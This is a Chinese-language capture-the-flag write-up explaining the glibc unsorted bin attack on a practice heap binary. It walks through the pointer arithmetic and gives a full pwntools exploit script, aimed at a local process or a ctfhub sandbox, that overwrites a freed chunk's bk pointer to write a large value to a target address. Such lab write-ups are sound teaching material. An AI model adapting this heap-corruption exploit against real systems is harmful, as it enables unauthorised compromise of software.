image-20240320193130571

magic大于28800即可。所以可以利用unsortedbin_attack来进行利用,unsortedbin_attack的作用就是可以修改任意地址内容为超大值。

Unsortedbin_Attack原理

当某堆块victimunsorted bin list中取出时,会进行bck = victim->bk; unsorted_chunks(av)->bk = bck; bck->fd = unsorted_chunks(av);的操作。

image-20240320205402841

当修改Unsortedbin的bk为magic_addr-0x10。

victim此时相当于0x129c030这个堆块。

bck = victim->bk相当于bck = 0x60209c

unsorted_chunks(av)->bk = bck相当于unsorted_chunks(av)->bk = 0x60209c

bck->fd = unsorted_chunks(av)相当于0x60209c+0x10=main_arena+88

image-20240320210407241

image-20240320210428589

EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
from pwn import *
from ctypes import *
from libcfind import *
from LibcSearcher import*
import base64
import sys
context(os='linux', arch='amd64', log_level='debug')
context.terminal = ["tmux","splitw","-h"]
debug = 1
if debug:
    p = process('./pwn')
    elf = ELF('./pwn')
    # p = process('', env={'LD_PRELOAD':'./libc.so'})
    # gdb.attach(p)
else:
    p = remote('challenge-cd5c5d30f5eb3ab2.sandbox.ctfhub.com', 24782)
    elf = ELF('./pwn')
# -----------------------------------------------------------------------
s = lambda data: p.send(data)
sa = lambda text, data: p.sendafter(text, data)
sl = lambda data: p.sendline(data)
sla = lambda text, data: p.sendlineafter(text, data)
r = lambda num=4096: p.recv(num)
rl = lambda text: p.recvuntil(text)
pr = lambda num=4096: sys.stdout.write(p.recv(num))
inter = lambda: p.interactive()
l32 = lambda: u32(p.recvuntil('\xf7')[-4:].ljust(4,'\x00'))
l64 = lambda: u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
uu32 = lambda: u32(p.recv(4).ljust(4, '\x00'))
uu64 = lambda: u64(p.recv(6).ljust(8, '\x00'))
int16 = lambda data: int(data, 16)
lg = lambda s, num: p.success('%s -> 0x%x' % (s, num))
# -----------------------------------------------------------------------
libc = ELF('./libc-2.23.so')
def add(size,content):
    rl(">> ")
    sl('1')
    rl("Size: ")
    sl(str(size))
    rl("Content: ")
    sl(content)

def show(index):
    rl(">> ")
    sl('3')
    rl("Index:\n")
    sl(str(index))
def delete(index):
    rl(">> ")
    sl('2')
    rl("Index:\n")
    sl(str(index))
def edit(index,size,content):
    rl(">> ")
    sl('4')
    rl("Index:\n")
    sl(str(index))
    rl("Size:\n")
    sl(str(size))
    rl("Content:\n")
    sl(content)

gdb.attach(p)
add(0x20,'aaa')
add(0x80,'aaa')
add(0x10,'aaa')
delete(1)

edit(0,-1,p64(0)*5+p64(0x91)+p64(0)+p64(0x6020AC-0x10))
pause()
add(0x80,'a')
pause()
rl(">> ")
sl('1024')
inter()

如果想将某个地址出的内容变为一个超大数,利用unsortedbin_attack可以实现

将unsortedbin的bk修改为target_addr-0x10

target_addr为目标地址